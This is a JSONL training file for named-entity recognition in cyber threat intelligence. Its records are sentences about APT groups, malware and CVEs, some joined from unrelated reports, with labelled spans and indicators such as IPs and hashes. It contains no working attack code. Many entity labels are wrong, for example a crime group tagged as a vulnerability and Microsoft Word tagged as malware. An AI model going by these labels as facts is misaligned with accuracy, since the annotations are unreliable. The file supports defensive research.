{"text": "Ensure event logging , including applications , events , login activities , and security attributes , is turned on or monitored for identification of security issues .", "spans": {}, "info": {"id": "cyberner_stix_train_003840", "source": "cyberner_stix_train"}}
{"text": "Thus respected journalists ( at least by me ) conflate the “ TRITON actor is active at another site ” with “ TRITON malware was identified at another site ” .", "spans": {"MALWARE: TRITON": [[61, 67], [109, 115]]}, "info": {"id": "cyberner_stix_train_003841", "source": "cyberner_stix_train"}}
{"text": "Server-side Carrier Checks In the JavaScript bridge API obfuscation example covered above , the server supplied the app with the necessary strings to complete the billing process . NetSarang , which has headquarters in South Korea and the United States , removed the backdoored update , but not before it was activated on at least one victim 's machine in Hong Kong . It filters each attempt to open the ZxShell protected driver or the main DLL , returning a reference to the “ netstat.exe ” file . Figure 11 : Sandworm TANKTRAP GPO 2", "spans": {"MALWARE: ZxShell": [[404, 411]], "TOOL: DLL": [[441, 444]], "FILEPATH: netstat.exe": [[478, 489]], "MALWARE: Sandworm TANKTRAP GPO": [[511, 532]]}, "info": {"id": "cyberner_stix_train_003842", "source": "cyberner_stix_train"}}
{"text": "In this case , “ Agent Smith ” is being used to for financial gain through the use of malicious advertisements . Unit 42 recently published a blog on a newly identified Trojan called Bookworm , which discussed the architecture and capabilities of the malware and alluded to Thailand being the focus of the threat actors' campaigns . An advanced persistent threat group , previously identified by Microsoft and codenamed Neodymium , is closely associated with BlackOasis ’ operations . Sandworm Team has used port 6789 to accept connections on the group 's SSH server.[34 ] Silence has used port 444 when sending data about the system from the client to the server.[35 ] StrongPity has used HTTPS over port 1402 in C2 communication.[36 ] SUGARUSH has used port 4585 for a TCP connection to its C2 .", "spans": {"MALWARE: Agent Smith": [[17, 28]], "ORGANIZATION: Unit 42": [[113, 120]], "TOOL: Bookworm": [[183, 191]], "ORGANIZATION: Microsoft": [[396, 405]], "THREAT_ACTOR: Neodymium": [[420, 429]], "THREAT_ACTOR: BlackOasis": [[459, 469]], "THREAT_ACTOR: Sandworm Team": [[485, 498]], "SYSTEM: SSH server.[34": [[556, 570]], "THREAT_ACTOR: Silence": [[573, 580]], "THREAT_ACTOR: StrongPity": [[670, 680]], "SYSTEM: HTTPS": [[690, 695]], "SYSTEM: C2 communication.[36": [[714, 734]], "MALWARE: SUGARUSH": [[737, 745]], "SYSTEM: a TCP connection to its C2": [[769, 795]]}, "info": {"id": "cyberner_stix_train_003843", "source": "cyberner_stix_train"}}
{"text": "Just a few months later , in February 2015 , we announced the discovery of Carbanak , a cyber-criminal gang that used custom malware and APT techniques to steal millions of dollars while infecting hundreds of financial institutions in at least 30 countries . In the past , we have seen the group using open-source password dumpers such as Mimikatz .", "spans": {"VULNERABILITY: Carbanak": [[75, 83]], "THREAT_ACTOR: cyber-criminal gang": [[88, 107]], "ORGANIZATION: financial institutions": [[209, 231]], "MALWARE: open-source password dumpers": [[302, 330]], "MALWARE: Mimikatz": [[339, 347]]}, "info": {"id": "cyberner_stix_train_003844", "source": "cyberner_stix_train"}}
{"text": "Nevertheless , resourceful threat actors such as ScarCruft will probably continue to deploy zero-day exploits against their high profile targets . APT5 has targeted or breached organizations across multiple industries , but its focus appears to be on telecommunications and technology companies , especially information about satellite communications .", "spans": {"THREAT_ACTOR: ScarCruft": [[49, 58]], "VULNERABILITY: zero-day exploits": [[92, 109]], "THREAT_ACTOR: APT5": [[147, 151]], "ORGANIZATION: telecommunications": [[251, 269]], "ORGANIZATION: technology companies": [[274, 294]], "ORGANIZATION: satellite communications": [[326, 350]]}, "info": {"id": "cyberner_stix_train_003845", "source": "cyberner_stix_train"}}
{"text": "Simple Backdoor Exploit to Hack Android Devices All you need to do to gain root access of an affected Android device is… Send the text \" rootmydevice '' to any undocumented debugging process . BRONZE UNION actors leveraged initial web shell access on Internet-facing systems to conduct internal reconnaissance . Outlaw : 104.236.192.6 . CrowdStrike incident responders found that renamed Plink and AnyDesk executable creation timestamps on affected backend Exchange servers were closely correlated with PowerShell execution events in the Remote PowerShell logs , indicating the threat actor leveraged the newly discovered exploit chain to drop other tooling for persistent access to the affected Exchange servers .", "spans": {"SYSTEM: Android": [[32, 39], [102, 109]], "THREAT_ACTOR: Outlaw": [[312, 318]], "IP_ADDRESS: 104.236.192.6": [[321, 334]], "ORGANIZATION: CrowdStrike incident responders": [[337, 368]], "THREAT_ACTOR: threat actor": [[578, 590]]}, "info": {"id": "cyberner_stix_train_003846", "source": "cyberner_stix_train"}}
{"text": "Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download . We also believe that both clusters of activity have links to attacks with likely Indian origins , the CONFUCIUS_A attacks are linked to the use of SNEEPY/BYEBYESHELL and the CONFUCIUS_B have a loose link to Hangover .", "spans": {"VULNERABILITY: CVE-2017-1099": [[71, 84]], "MALWARE: RTF attachments": [[100, 115]], "MALWARE: SNEEPY/BYEBYESHELL": [[274, 292]], "FILEPATH: CONFUCIUS_B": [[301, 312]], "MALWARE: Hangover": [[334, 342]]}, "info": {"id": "cyberner_stix_train_003847", "source": "cyberner_stix_train"}}
{"text": "According to the FBI , the SNAKEMACKEREL threat group \"is part of an ongoing campaign of cyber-enabled operations directed at the United States government and its citizens .", "spans": {"ORGANIZATION: FBI": [[17, 20]], "THREAT_ACTOR: SNAKEMACKEREL": [[27, 40]]}, "info": {"id": "cyberner_stix_train_003848", "source": "cyberner_stix_train"}}
{"text": "Recently , we discovered a campaign launched at various Ministries of Foreign Affairs around the world .", "spans": {"ORGANIZATION: Ministries of Foreign Affairs": [[56, 85]]}, "info": {"id": "cyberner_stix_train_003849", "source": "cyberner_stix_train"}}
{"text": "This quest to determine the currently running application is a hallmark of overlay malware , so we thought we ’ d take a closer look at how it ’ s done . Operation Daybreak appears to have been launched by unknown attackers to infect high profile targets through spear-phishing e-mails . Defeating Compiler-Level Obfuscations Used in APT10 Malware . The group , which was primarily motivated by profit , is noted for utilizing self - developed technically - proficient tools for their attacks .", "spans": {"THREAT_ACTOR: attackers": [[214, 223]], "THREAT_ACTOR: APT10": [[334, 339]]}, "info": {"id": "cyberner_stix_train_003850", "source": "cyberner_stix_train"}}
{"text": "The request codes are actually replies to the C2 action requests , which are actually called \" responses . The LYCEUM threat group targets organizations in sectors of strategic national importance , including oil and gas and possibly telecommunications . Because APT38 is backed by ( and acts on behalf of ) the North Korean regime , we opted to categorize the group as an \" APT \" instead of a \" FIN \" .", "spans": {"THREAT_ACTOR: LYCEUM": [[111, 117]], "ORGANIZATION: strategic national importance": [[167, 196]], "ORGANIZATION: oil and gas": [[209, 220]], "ORGANIZATION: telecommunications": [[234, 252]], "THREAT_ACTOR: APT38": [[263, 268]]}, "info": {"id": "cyberner_stix_train_003851", "source": "cyberner_stix_train"}}
{"text": "BRONZE PRESIDENT has demonstrated intent to steal data from organizations using tools such as Cobalt Strike , PlugX , ORat , and RCSession .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[0, 16]], "TOOL: Cobalt Strike": [[94, 107]], "MALWARE: PlugX": [[110, 115]], "MALWARE: ORat": [[118, 122]], "MALWARE: RCSession": [[129, 138]]}, "info": {"id": "cyberner_stix_train_003852", "source": "cyberner_stix_train"}}
{"text": "The binary infection procedure in the Windows system differed from the previous case .", "spans": {"SYSTEM: Windows": [[38, 45]]}, "info": {"id": "cyberner_stix_train_003853", "source": "cyberner_stix_train"}}
{"text": "Beginning in mid-January 2019 , TA542 distributed millions of Emotet-laden emails in both English and German . Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word .", "spans": {"VULNERABILITY: CVE-2012-0158": [[190, 203]], "VULNERABILITY: exploit": [[207, 214]], "FILEPATH: Microsoft Word": [[215, 229]]}, "info": {"id": "cyberner_stix_train_003854", "source": "cyberner_stix_train"}}
{"text": "In addition , Kaspersky discovered that the Winnti group uses a popular backdoor known as PlugX which also has Chinese origins . It was reported by Symantec to Microsoft in September 2018 and was patched on March 12 , 2019 . How Buckeye obtained Equation Group tools at least a year prior to the Shadow Brokers leak remains unknown .", "spans": {"ORGANIZATION: Kaspersky": [[14, 23]], "THREAT_ACTOR: Winnti": [[44, 50]], "TOOL: PlugX": [[90, 95]], "ORGANIZATION: Symantec": [[148, 156]], "ORGANIZATION: Microsoft": [[160, 169]], "THREAT_ACTOR: Buckeye": [[229, 236]], "MALWARE: Equation Group tools": [[246, 266]]}, "info": {"id": "cyberner_stix_train_003855", "source": "cyberner_stix_train"}}
{"text": "In some instances , APT41 leveraged POISONPLUG as a first-stage backdoor to deploy the HIGHNOON backdoor in the targeted environment . The sctrls backdoor we came across is delivered via RTF files exploiting CVE-2015-1641 .", "spans": {"THREAT_ACTOR: APT41": [[20, 25]], "TOOL: POISONPLUG": [[36, 46]], "TOOL: HIGHNOON": [[87, 95]], "MALWARE: sctrls backdoor": [[139, 154]], "VULNERABILITY: CVE-2015-1641": [[208, 221]]}, "info": {"id": "cyberner_stix_train_003856", "source": "cyberner_stix_train"}}
{"text": "Instead , OurMine had managed to alter WikiLeaks 's DNS records ( held by a third-party registrar ) to direct anyone who tried to visit wikileaks.org to visit a different IP address which definitely wasn't under the control of Julian Assange and his cronies . He is responsible for developing tools for conducting attacks and is also able to modify complex exploits and third party software .", "spans": {"THREAT_ACTOR: OurMine": [[10, 17]], "ORGANIZATION: WikiLeaks": [[39, 48]]}, "info": {"id": "cyberner_stix_train_003857", "source": "cyberner_stix_train"}}
{"text": "Trojan.SH.MALXMR.UWEJP : 1800de5f0fb7c5ef3c0d9787260ed61bc324d861bc92d9673d4737d1421972aa .", "spans": {"MALWARE: Trojan.SH.MALXMR.UWEJP": [[0, 22]], "FILEPATH: 1800de5f0fb7c5ef3c0d9787260ed61bc324d861bc92d9673d4737d1421972aa": [[25, 89]]}, "info": {"id": "cyberner_stix_train_003858", "source": "cyberner_stix_train"}}
{"text": "Facebook phishing One of the interesting features of this spyware is the ability to steal Facebook credentials using a fake login page , similar to phishing . Between June and September 2017 , Bemstour was also used against targets in the Philippines and Vietnam . The group was first seen in June 2016 .", "spans": {"SYSTEM: Facebook": [[0, 8], [90, 98]], "MALWARE: Bemstour": [[193, 201]]}, "info": {"id": "cyberner_stix_train_003859", "source": "cyberner_stix_train"}}
{"text": "Some of the group's phishing lures suggest an interest in national security , humanitarian , and law enforcement organizations in the East , South , and Southeast Asia ( see Figure 1 ) .", "spans": {}, "info": {"id": "cyberner_stix_train_003860", "source": "cyberner_stix_train"}}
{"text": "These samples would also contain artefacts of functionality from the earliest CosmicDuke samples from 2010 .", "spans": {"MALWARE: CosmicDuke": [[78, 88]]}, "info": {"id": "cyberner_stix_train_003861", "source": "cyberner_stix_train"}}
{"text": "The algorithm for generating the lowest-level domain name was hardwired in the Trojan ’ s code . Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal . The cybercriminal group Lazarus has a history of attacking financial organizations in Asia and Latin America .", "spans": {"MALWARE: Documents": [[97, 106]], "VULNERABILITY: Flash exploit": [[116, 129]], "THREAT_ACTOR: Lazarus": [[239, 246]], "ORGANIZATION: financial organizations": [[274, 297]]}, "info": {"id": "cyberner_stix_train_003862", "source": "cyberner_stix_train"}}
{"text": "Cannon logs into the secondary email account via POP3S looking for emails with a subject that matches the unique system identifier .", "spans": {"MALWARE: Cannon": [[0, 6]], "TOOL: email": [[31, 36]], "TOOL: emails": [[67, 73]]}, "info": {"id": "cyberner_stix_train_003863", "source": "cyberner_stix_train"}}
{"text": "Much of the information being stolen appear to be military-related . These codes are often leveraged in the malware used by coordinated targeted attackers to differentiate victims that were successfully compromised from different target sets . FIN7 operations are linked to numerous intrusion attempts having targeted hundreds of companies since at least as early as 2015 . They used their unauthorized access to obtain digital certificates that were later exploited in malware campaigns targeting other industries and political activists .", "spans": {"THREAT_ACTOR: FIN7": [[244, 248]], "ORGANIZATION: industries": [[504, 514]], "ORGANIZATION: political activists": [[519, 538]]}, "info": {"id": "cyberner_stix_train_003864", "source": "cyberner_stix_train"}}
{"text": "Vulnerabilities Reported BLU Products , founded in 2009 , makes lower-end Android-powered smartphones that sell for as little as $ 50 on Amazon . Rapid7 discovered that additional data was placed into the Dropbox accounts under control of the attacker during the compromise and was able to attribute data that was placed into it as being owned by Visma . Invader : 0df20ccd074b722d5fe1358b329c7bdebcd7e3902a1ca4ca8d5a98cc5ce4c287 .", "spans": {"SYSTEM: Android-powered": [[74, 89]], "ORGANIZATION: Amazon": [[137, 143]], "ORGANIZATION: Rapid7": [[146, 152]], "THREAT_ACTOR: attacker": [[243, 251]], "MALWARE: Invader": [[355, 362]], "FILEPATH: 0df20ccd074b722d5fe1358b329c7bdebcd7e3902a1ca4ca8d5a98cc5ce4c287": [[365, 429]]}, "info": {"id": "cyberner_stix_train_003866", "source": "cyberner_stix_train"}}
{"text": "XENOTIME used credential capture and replay to move between networks , Windows commands , standard command-line tools such as PSExec , and proprietary tools for operations on victim hosts . ( Full reports detailing XENOTIME ’s tool techniques , and procedures are available to Dragos WorldView customers . ) Because the TRISIS malware framework was highly tailored , it would have required specific knowledge of the Triconex ’s infrastructure and processes within a specific plant .", "spans": {"THREAT_ACTOR: XENOTIME": [[0, 8], [215, 223]], "SYSTEM: Windows": [[71, 78]], "TOOL: PSExec": [[126, 132]], "ORGANIZATION: Dragos": [[277, 283]], "TOOL: WorldView": [[284, 293]], "MALWARE: TRISIS": [[320, 326]], "TOOL: Triconex": [[416, 424]]}, "info": {"id": "cyberner_stix_train_003867", "source": "cyberner_stix_train"}}
{"text": "Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word . The authors of that report identify three primary tools used in the campaigns attributed to Hidden Lynx : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit .", "spans": {"VULNERABILITY: CVE-2012-0158": [[79, 92]], "MALWARE: Microsoft Word": [[104, 118]], "MALWARE: Trojan.Naid": [[227, 238]], "FILEPATH: Backdoor.Moudoor": [[241, 257]], "MALWARE: Backdoor.Hikit": [[264, 278]]}, "info": {"id": "cyberner_stix_train_003868", "source": "cyberner_stix_train"}}
{"text": "Government agencies and enterprises should look at this threat as an example of the kind of spying that is now possible given how ubiquitous mobile devices are in the workplace . Now GozNym is now targeting 13 banks and subsidiaries in Germany , Limor Kessem , Executive Security Advisor at IBM , said Tuesday . The standard , non-WEBC2 APT1 backdoor typically communicates using the HTTP protocol ( to blend in with legitimate web traffic ) or a custom protocol that the malware authors designed themselves . In addition to stealing digital certificates , the Winnti gang 's campaign appears to be motivated by the desire to manipulate in - game currency , such as \" runes \" or \" gold , \" that can in many cases be converted into real currency .", "spans": {"TOOL: GozNym": [[183, 189]], "ORGANIZATION: banks": [[210, 215]], "ORGANIZATION: subsidiaries": [[220, 232]], "ORGANIZATION: Kessem": [[252, 258]], "ORGANIZATION: Executive Security": [[261, 279]], "ORGANIZATION: IBM": [[291, 294]], "MALWARE: non-WEBC2": [[327, 336]], "THREAT_ACTOR: APT1": [[337, 341]]}, "info": {"id": "cyberner_stix_train_003869", "source": "cyberner_stix_train"}}
{"text": "We believe the 2013 , 2015 , and 2016 KeyBoy samples provide evidence of a development effort focused on changing components that would be used by researchers to develop detection signatures . The CVE-2012-0773 was originally discovered by VUPEN and has an interesting story .", "spans": {"TOOL: KeyBoy samples": [[38, 52]], "VULNERABILITY: CVE-2012-0773": [[197, 210]]}, "info": {"id": "cyberner_stix_train_003870", "source": "cyberner_stix_train"}}
{"text": "On multiple dates in 2017 , TEMP.Veles struggled to execute this utility on multiple victim systems , potentially due to AV detection .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[28, 38]]}, "info": {"id": "cyberner_stix_train_003871", "source": "cyberner_stix_train"}}
{"text": "The Trojan uses this counter to activate the bot - if aforementioned step counter hits the pre-configured threshold it considers running on the device to be safe . It can be seen that after the code leakage , the CEO of the HackingTeam organization said that the leaked code is only a small part is based on the facts , which also reflects that the network arms merchants have lowered the threshold of APT attacks to a certain extent , making more uncertainties of cyber attacks . Remexi is a basic back door Trojan that allows attackers to open a remote shell on the computer and execute commands .", "spans": {"THREAT_ACTOR: HackingTeam": [[224, 235]], "MALWARE: Remexi": [[481, 487]], "MALWARE: Trojan": [[509, 515]], "THREAT_ACTOR: attackers": [[528, 537]]}, "info": {"id": "cyberner_stix_train_003872", "source": "cyberner_stix_train"}}
{"text": "However , at the time of writing , we were unable to identify relevant conversations about the EventBot malware . The delivery of KopiLuwak in this instance is currently unknown as the MSIL dropper has only been observed by Proofpoint researchers on a public malware repository . Magic Hound will often find simpler ACTs for effective compromise , such as creative phishing and simple custom malware .", "spans": {"MALWARE: EventBot": [[95, 103]], "MALWARE: MSIL dropper": [[185, 197]], "ORGANIZATION: Proofpoint": [[224, 234]]}, "info": {"id": "cyberner_stix_train_003873", "source": "cyberner_stix_train"}}
{"text": "The “ InternetExchange ” export closes the established connection and frees associated handles .", "spans": {}, "info": {"id": "cyberner_stix_train_003874", "source": "cyberner_stix_train"}}
{"text": "Conclusion Gooligan has breached over a million Google accounts . BRONZE BUTLER has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . we never get the pointer . Second , as COSMICENERGY was potentially developed as part of a red team , this discovery suggests that the barriers to entry are lowering for offensive OT threat activity since we normally observe these types of capabilities limited to well resourced or state sponsored actors .", "spans": {"MALWARE: Gooligan": [[11, 19]], "ORGANIZATION: Google": [[48, 54]], "THREAT_ACTOR: BRONZE BUTLER": [[66, 79]], "TOOL: Daserf malware": [[162, 176]], "VULNERABILITY: Flash exploits": [[202, 216]], "MALWARE: COSMICENERGY": [[274, 286]]}, "info": {"id": "cyberner_stix_train_003875", "source": "cyberner_stix_train"}}
{"text": "The sample we analyzed in October , for example , contains a plugin that is able to spy on internet connections , and can even divert some SSL connections and steal data from encrypted traffic . There is not much public information about the APT campaign called menuPass ( also known as Stone Panda and APT10 ) . After the content of resource 0xC8 is decompressed , another function from the backdoor DLL is used to load the C2 communication module to the memory and call its \" CreateInstance \" export . The group , which was primarily motivated by profit , is noted for utilizing self - developed technically - proficient tools for their attacks .", "spans": {"THREAT_ACTOR: menuPass": [[262, 270]], "THREAT_ACTOR: Stone Panda": [[287, 298]], "THREAT_ACTOR: APT10": [[303, 308]], "TOOL: DLL": [[401, 404]], "TOOL: C2": [[425, 427]], "TOOL: CreateInstance": [[478, 492]]}, "info": {"id": "cyberner_stix_train_003877", "source": "cyberner_stix_train"}}
{"text": "Associated indicators and screenshots of the decoy documents are all available here in the ThreatConnect platform .", "spans": {"ORGANIZATION: ThreatConnect": [[91, 104]]}, "info": {"id": "cyberner_stix_train_003879", "source": "cyberner_stix_train"}}
{"text": "APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments , militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian Government . Symantec during 2012 linked the Elderwood Project to Operation Aurora ; Trojan.Naid and Backdoor.Moudoor were also used in Aurora , by the Elderwood Gang , and by Hidden Lynx .", "spans": {"ORGANIZATION: governments": [[137, 148]], "ORGANIZATION: militaries": [[151, 161]], "ORGANIZATION: defense attaches": [[164, 180]], "ORGANIZATION: media entities": [[183, 197]], "ORGANIZATION: dissidents": [[204, 214]], "ORGANIZATION: figures": [[219, 226]], "ORGANIZATION: Symantec": [[271, 279]], "MALWARE: Trojan.Naid": [[343, 354]], "FILEPATH: Backdoor.Moudoor": [[359, 375]], "MALWARE: Aurora": [[394, 400]], "THREAT_ACTOR: Elderwood Gang": [[410, 424]], "THREAT_ACTOR: Hidden Lynx": [[434, 445]]}, "info": {"id": "cyberner_stix_train_003880", "source": "cyberner_stix_train"}}
{"text": "The source process writes the native shellcode into the memory region allocated by mmap . Since March 2015 , ESET has detected Potao binaries at several high-value Ukrainian targets that include government and military entities and one of the major Ukrainian news agencies . APT17 : 0370002227619c205402c48bde4332f6 . It consists of two frames , one for loading the decoy web page from a legitimate website ( copied from http://www.albannagroup.com/business-principles.html ) , and another for performing malicious activities ( hxxp://[c2_hostname]/groups / sidebar.html )", "spans": {"ORGANIZATION: ESET": [[109, 113]], "TOOL: Potao": [[127, 132]], "ORGANIZATION: government": [[195, 205]], "ORGANIZATION: military entities": [[210, 227]], "ORGANIZATION: news agencies": [[259, 272]], "THREAT_ACTOR: APT17": [[275, 280]], "FILEPATH: 0370002227619c205402c48bde4332f6": [[283, 315]]}, "info": {"id": "cyberner_stix_train_003881", "source": "cyberner_stix_train"}}
{"text": "Living Off the Land .", "spans": {}, "info": {"id": "cyberner_stix_train_003882", "source": "cyberner_stix_train"}}
{"text": "The malicious documents seen in recent activity refer to a number of topics , including recent military promotions within the Pakistan Army , information related to the Pakistan Atomic Energy Commission , as well as Pakistan 's Ministry of the Interior . This sample was also found to be deployed using the CVE-2012-0158 vulnerability .", "spans": {"MALWARE: malicious documents": [[4, 23]], "ORGANIZATION: Pakistan Army": [[126, 139]], "VULNERABILITY: CVE-2012-0158": [[307, 320]]}, "info": {"id": "cyberner_stix_train_003883", "source": "cyberner_stix_train"}}
{"text": "- There were two interesting sub-classes found inside Main Activity : Receiver and Sender . According to local media reports , in 2019 Silence successfully withdrew money from the Bangladeshi bank twice within 2 months . The organised crime group started its high-tech criminal activities in late 2013 by launching the Anunak malware campaign that targeted financial transfers and ATM networks of financial institutions around the world .", "spans": {"THREAT_ACTOR: Silence": [[135, 142]], "ORGANIZATION: bank": [[192, 196]], "ORGANIZATION: financial institutions": [[397, 419]]}, "info": {"id": "cyberner_stix_train_003884", "source": "cyberner_stix_train"}}
{"text": "An expected break following the 2016-2017 winter holidays turned into an unexplained three-month hiatus for TA505 .", "spans": {"THREAT_ACTOR: TA505": [[108, 113]]}, "info": {"id": "cyberner_stix_train_003885", "source": "cyberner_stix_train"}}
{"text": "Permissions in the manifest This malware is designed to avoid detection and analysis . This operation has targeted managed IT service providers , the compromise of which provides APT10 with potential access to thousands of further victims . Although precise attribution is not available at the moment , certain evidence we have collected allows us to link this attack to the ShadowPad incident from 2017 . Most fraudsters create one - time email addresses or use stolen email addresses , both of which are easy to create or obtain .", "spans": {"ORGANIZATION: managed IT service providers": [[115, 143]], "THREAT_ACTOR: APT10": [[179, 184]], "THREAT_ACTOR: fraudsters": [[411, 421]]}, "info": {"id": "cyberner_stix_train_003886", "source": "cyberner_stix_train"}}
{"text": "These are adapted to the information the malicious operator wants to retrieve . We attribute this activity to TEMP.Zagros ( reported by Palo Alto Networks and Trend Micro as MuddyWater ) , an Iran-nexus actor that has been active since at least May 2017 . Sample ( SHA256 : bc1c3e754be9f2175b718aba62174a550cdc3d98ab9c36671a58073140381659 ) has the same export entry name and is also a reverse shell . An adversary may also destroy data backups that are vital to recovery after an incident .", "spans": {"THREAT_ACTOR: TEMP.Zagros": [[110, 121]], "ORGANIZATION: Palo Alto Networks": [[136, 154]], "ORGANIZATION: Trend Micro": [[159, 170]], "THREAT_ACTOR: MuddyWater": [[174, 184]], "THREAT_ACTOR: actor": [[203, 208]], "FILEPATH: bc1c3e754be9f2175b718aba62174a550cdc3d98ab9c36671a58073140381659": [[274, 338]], "TOOL: reverse shell": [[386, 399]], "ORGANIZATION: adversary": [[405, 414]]}, "info": {"id": "cyberner_stix_train_003887", "source": "cyberner_stix_train"}}
{"text": "It will also take a photo using the device ’ s front camera when the user wakes the device . The ScarCruft group keeps expanding its exfiltration targets to steal further information from infected hosts and continues to create tools for additional data exfiltration . The second module is used by the operators to execute an obfuscated PowerShell script , which contains a Meterpreter downloader widely known as “ Tinymet “ . For the actors and groups who originally created the malware , it is a more reliable income stream for them .", "spans": {"THREAT_ACTOR: ScarCruft": [[97, 106]], "TOOL: PowerShell": [[336, 346]], "TOOL: Meterpreter": [[373, 384]], "TOOL: downloader": [[385, 395]], "TOOL: Tinymet": [[414, 421]], "THREAT_ACTOR: actors": [[434, 440]]}, "info": {"id": "cyberner_stix_train_003888", "source": "cyberner_stix_train"}}
{"text": "This joint Technical Alert ( TA ) is the result of analytic efforts between the Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) .", "spans": {"ORGANIZATION: Department of Homeland Security": [[80, 111]], "ORGANIZATION: DHS": [[114, 117]], "ORGANIZATION: Federal Bureau of Investigation": [[128, 159]], "ORGANIZATION: FBI": [[162, 165]]}, "info": {"id": "cyberner_stix_train_003889", "source": "cyberner_stix_train"}}
{"text": "We have only seen CVE-2015-1701 in use in conjunction with the Adobe Flash exploit for CVE-2015-3043 .", "spans": {"VULNERABILITY: CVE-2015-1701": [[18, 31]], "TOOL: Adobe Flash": [[63, 74]], "VULNERABILITY: CVE-2015-3043": [[87, 100]]}, "info": {"id": "cyberner_stix_train_003890", "source": "cyberner_stix_train"}}
{"text": "Once started , it downloads additional malware from the C2 and also uploads some basic system information , stealing , among other things , the user 's Google Chrome credentials . These samples were contained in exploit documents containing distinct lure content , one having a Tibetan nexus , the other an Indian nexus .", "spans": {"VULNERABILITY: exploit": [[212, 219]]}, "info": {"id": "cyberner_stix_train_003891", "source": "cyberner_stix_train"}}
{"text": "Attackers can now communicate with the compromised machine and remotely execute commands on it .", "spans": {}, "info": {"id": "cyberner_stix_train_003892", "source": "cyberner_stix_train"}}
{"text": "The reply , if its length is not equal to six and its contents do not contain “ OK ” is returned back to the caller .", "spans": {}, "info": {"id": "cyberner_stix_train_003893", "source": "cyberner_stix_train"}}
{"text": "360 Helios Team captured the first Trojan of the Poison Ivy Group in December 2007 . In the last few weeks , FormBook was seen downloading other malware families such as NanoCore .", "spans": {"ORGANIZATION: 360 Helios Team": [[0, 15]], "TOOL: Poison Ivy": [[49, 59]], "FILEPATH: FormBook": [[109, 117]], "FILEPATH: NanoCore": [[170, 178]]}, "info": {"id": "cyberner_stix_train_003894", "source": "cyberner_stix_train"}}
{"text": "During this time , “ Agent Smith ” hackers eventually built up a vast number of app presence on 9Apps , which later would serve as publication channels for evolved droppers . The group still uses the Badnews malware , a backdoor with information-stealing and file-executing capabilities , albeit updated with a slight modification in the encryption routine at the end of 2017 , when they added Blowfish encryption on top of their custom encryption described in our former Patchwork blogpost . For Dexphot , machine learning-based detections in the cloud recognize and block the DLLs loaded by rundll32.exe , stopping the attack chain in its early stages . We recommend checking the following for potential evidence of compromise : • Child processes of on Exchange Servers , particularly .", "spans": {"MALWARE: Agent Smith": [[21, 32]], "SYSTEM: 9Apps": [[96, 101]], "TOOL: Badnews malware": [[200, 215]], "THREAT_ACTOR: Patchwork": [[472, 481]], "MALWARE: Dexphot": [[497, 504]], "TOOL: DLLs": [[578, 582]], "FILEPATH: rundll32.exe": [[593, 605]]}, "info": {"id": "cyberner_stix_train_003895", "source": "cyberner_stix_train"}}
{"text": "] 205 [ . Mandiant has observed Russian nation-state attackers APT29 employing domain fronting techniques for stealthy backdoor access to victim environments for at least two years . This variant ( the metadata for which is listed below ) is Gandcrab version . Cisco , Microsoft , and other tech companies have joined in supporting Meta 's lawsuit against the NSO Group referenced above through court filings .", "spans": {"ORGANIZATION: Mandiant": [[10, 18]], "THREAT_ACTOR: attackers": [[53, 62]], "THREAT_ACTOR: APT29": [[63, 68]], "MALWARE: Gandcrab": [[242, 250]], "ORGANIZATION: Cisco": [[261, 266]], "ORGANIZATION: Microsoft": [[269, 278]], "ORGANIZATION: Meta 's lawsuit": [[332, 347]]}, "info": {"id": "cyberner_stix_train_003896", "source": "cyberner_stix_train"}}
{"text": "CSIS provided a ( sanitised ) version of a typical message to warn users what to look out for : “ You have received a multimedia message from + [ country code ] [ sender number ] Follow the link http : //www.mmsforyou [ . Back in 2013 , CopyKittens used several Facebook profiles to spread links to a website impersonating Haaretz news , an Israeli newspaper . event ( according to Hex-Rays , The four - byte value at offset 0x416 ( 0x3e8 or decimal 1000 ) is the backdoor ’s version number .", "spans": {"ORGANIZATION: CSIS": [[0, 4]], "THREAT_ACTOR: CopyKittens": [[237, 248]], "ORGANIZATION: Facebook": [[262, 270]], "TOOL: Hex-Rays": [[382, 390]]}, "info": {"id": "cyberner_stix_train_003897", "source": "cyberner_stix_train"}}
{"text": "10 million Android phones infected by all-powerful auto-rooting apps First detected in November , Shedun/HummingBad infections are surging . Around 55% of the victims of Lazarus were located in India and neighboring countries . APT33 : 8.26.21.120 [REDACTED].ddns.net . Through this entry , in which we take a closer look at an individual who we believe might be connected to the Winnti group , we hope to give both ordinary users and organizations better insights into some of the tools – notably the server infrastructures- these kinds of threat actors use , as well as the scale in which they operate .", "spans": {"SYSTEM: Android": [[11, 18]], "MALWARE: Shedun/HummingBad": [[98, 115]], "THREAT_ACTOR: Lazarus": [[170, 177]], "THREAT_ACTOR: APT33": [[228, 233]], "IP_ADDRESS: 8.26.21.120": [[236, 247]], "DOMAIN: [REDACTED].ddns.net": [[248, 267]], "THREAT_ACTOR: Winnti group": [[380, 392]], "ORGANIZATION: ordinary users": [[416, 430]], "ORGANIZATION: organizations": [[435, 448]], "TOOL: tools": [[482, 487]], "SYSTEM: server infrastructures-": [[502, 525]], "THREAT_ACTOR: threat actors": [[541, 554]]}, "info": {"id": "cyberner_stix_train_003898", "source": "cyberner_stix_train"}}
{"text": "This diagram illustrates the whole process . The PassCV group continues to be one of the most successful and active threat groups that leverage a wide array of stolen Authenticode-signing certificates . APT17 : 121.101.73.231 . Clients using Internet Explorer version 8 are served with “ about.htm ” , for other versions of the browser and for any other browser capable of running Java applets , the JavaScript code loads “ JavaApplet.html ” .", "spans": {"THREAT_ACTOR: PassCV group": [[49, 61]], "THREAT_ACTOR: APT17": [[203, 208]], "IP_ADDRESS: 121.101.73.231": [[211, 225]], "SYSTEM: Internet Explorer version 8": [[242, 269]]}, "info": {"id": "cyberner_stix_train_003899", "source": "cyberner_stix_train"}}
